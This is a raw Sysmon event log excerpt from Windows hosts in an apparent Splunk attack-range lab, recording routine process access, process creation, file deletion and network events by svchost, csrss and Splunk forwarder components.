14:16:50.281{0A5DF930-E35B-6299-0C00-000000006002}7241764C:\Windows\system32\svchost.exe{0A5DF930-E35C-6299-1F00-000000006002}2024C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000044005Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:16:50.281{0A5DF930-E35B-6299-0C00-000000006002}7241764C:\Windows\system32\svchost.exe{0A5DF930-E35C-6299-1F00-000000006002}2024C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000044004Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:16:50.281{0A5DF930-E35B-6299-0500-000000006002}4121840C:\Windows\system32\csrss.exe{0A5DF930-17D2-629A-1007-000000006002}3792C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000044003Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:16:50.281{0A5DF930-E3BE-6299-9D00-000000006002}20843480C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{0A5DF930-17D2-629A-1007-000000006002}3792C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+e499f1|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1b3255|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bd30d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1b59b6|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd3c14|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bd79a|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1c0f1c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd07d2|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd491d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bb965|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dc694e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x800000000000000044002Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:16:50.282{0A5DF930-17D2-629A-1007-000000006002}3792C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{0A5DF930-E35B-6299-E703-000000000000}0x3e70SystemMD5=82B4C70E6AA15CE4AABB631DA73429A2,SHA256=80ECB7DFA33366FD12D6796A32E0435355F620DA83A8894D00BBAB09197A0F10,IMPHASH=1BDECF92268D3D3EF70015DDFEB0FFB9{0A5DF930-E3BE-6299-9D00-000000006002}2084C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x800000000000000044047Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:16:51.750{0A5DF930-17D3-629A-1207-000000006002}34323340C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe{0A5DF930-E3BE-6299-9D00-000000006002}2084C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+610325|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+60fe56|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+60943|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+60f97|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+9e7f20|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000044046Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:16:51.531{0A5DF930-E3BF-6299-A100-000000006002}31841748C:\Windows\system32\conhost.exe{0A5DF930-17D3-629A-1207-000000006002}3432C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000044045Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:16:51.531{0A5DF930-E35B-6299-0C00-000000006002}7241764C:\Windows\system32\svchost.exe{0A5DF930-E35C-6299-1F00-000000006002}2024C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000044044Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:16:51.531{0A5DF930-E35B-6299-0C00-000000006002}7241764C:\Windows\system32\svchost.exe{0A5DF930-E35C-6299-1F00-000000006002}2024C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000044043Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:16:51.531{0A5DF930-E35B-6299-0C00-000000006002}7241764C:\Windows\system32\svchost.exe{0A5DF930-E35C-6299-1F00-000000006002}2024C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000044042Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:16:51.531{0A5DF930-E35B-6299-0C00-000000006002}7241764C:\Windows\system32\svchost.exe{0A5DF930-E35C-6299-1F00-000000006002}2024C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000044041Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:16:51.531{0A5DF930-E35B-6299-0C00-000000006002}7241764C:\Windows\system32\svchost.exe{0A5DF930-E35C-6299-1F00-000000006002}2024C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000044040Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:16:51.531{0A5DF930-E35B-6299-0C00-000000006002}7241764C:\Windows\system32\svchost.exe{0A5DF930-E35C-6299-1F00-000000006002}2024C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000044039Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:16:51.531{0A5DF930-E35B-6299-0C00-000000006002}7241764C:\Windows\system32\svchost.exe{0A5DF930-E35C-6299-1F00-000000006002}2024C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000044038Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:16:51.531{0A5DF930-E35B-6299-0C00-000000006002}7241764C:\Windows\system32\svchost.exe{0A5DF930-E35C-6299-1F00-000000006002}2024C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000044037Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:16:51.531{0A5DF930-E35B-6299-0C00-000000006002}7241764C:\Windows\system32\svchost.exe{0A5DF930-E35C-6299-1F00-000000006002}2024C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000044036Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:16:51.531{0A5DF930-E35B-6299-0500-000000006002}412948C:\Windows\system32\csrss.exe{0A5DF930-17D3-629A-1207-000000006002}3432C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000044035Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:16:51.531{0A5DF930-E3BE-6299-9D00-000000006002}20843480C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{0A5DF930-17D3-629A-1207-000000006002}3432C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+e499f1|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1b3255|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bd30d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1b59b6|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd3c14|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bd79a|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1c0f1c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd07d2|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd491d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bb965|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dc694e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x800000000000000044034Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:16:51.533{0A5DF930-17D3-629A-1207-000000006002}3432C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.2.5Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{0A5DF930-E35B-6299-E703-000000000000}0x3e70SystemMD5=C8BED8D054FDE4C4222F39C750539874,SHA256=765D1E768D7027343C681DF3B2F6113ED0337F7179CDAE9CF89979A8725CE490,IMPHASH=5DCBAD7446F97D73DA1DA121D8CD8778{0A5DF930-E3BE-6299-9D00-000000006002}2084C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x800000000000000044033Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:16:51.531{0A5DF930-E3CD-6299-E900-000000006002}4064NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=03CC2D5D53DA806ED2527F1C9C6113B3,SHA256=0A480C15C2B72EBF88F458C84D23EA80F82C135D72E7F6F22426B7A6402B6CEB,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000044032Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:16:49.753{0A5DF930-E3C7-6299-CE00-000000006002}1272C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-ct-attack-range-726.eu-central-1.compute.internal52329-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 10341000x800000000000000044031Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:16:51.140{0A5DF930-17D2-629A-1107-000000006002}32242412C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{0A5DF930-E3BE-6299-9D00-000000006002}2084C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+606005|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+605b36|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+75996|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+9dd220|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 354300x8000000000000000205142Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:50.765{2E1864BB-E1C6-6299-D800-000000005F02}3988C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-ct-attack-range-304.attackrange.local56357-false10.0.1.12-8000- 23542300x800000000000000044061Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:16:52.625{0A5DF930-E3CD-6299-E900-000000006002}4064NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=220E9614D947483527CCD97B338C4DBE,SHA256=85341C5F13B56CF2FCD9ABC53EA13CCAF385A8ACCF0AD84DD5D85984E9F70CAC,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000044060Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:16:52.594{0A5DF930-E3BF-6299-A100-000000006002}31841748C:\Windows\system32\conhost.exe{0A5DF930-17D4-629A-1307-000000006002}4028C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000044059Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:16:52.594{0A5DF930-E35B-6299-0C00-000000006002}7241764C:\Windows\system32\svchost.exe{0A5DF930-E35C-6299-1F00-000000006002}2024C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000044058Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:16:52.594{0A5DF930-E35B-6299-0C00-000000006002}7241764C:\Windows\system32\svchost.exe{0A5DF930-E35C-6299-1F00-000000006002}2024C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000044057Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:16:52.594{0A5DF930-E35B-6299-0C00-000000006002}7241764C:\Windows\system32\svchost.exe{0A5DF930-E35C-6299-1F00-000000006002}2024C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000044056Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:16:52.594{0A5DF930-E35B-6299-0C00-000000006002}7241764C:\Windows\system32\svchost.exe{0A5DF930-E35C-6299-1F00-000000006002}2024C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000044055Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 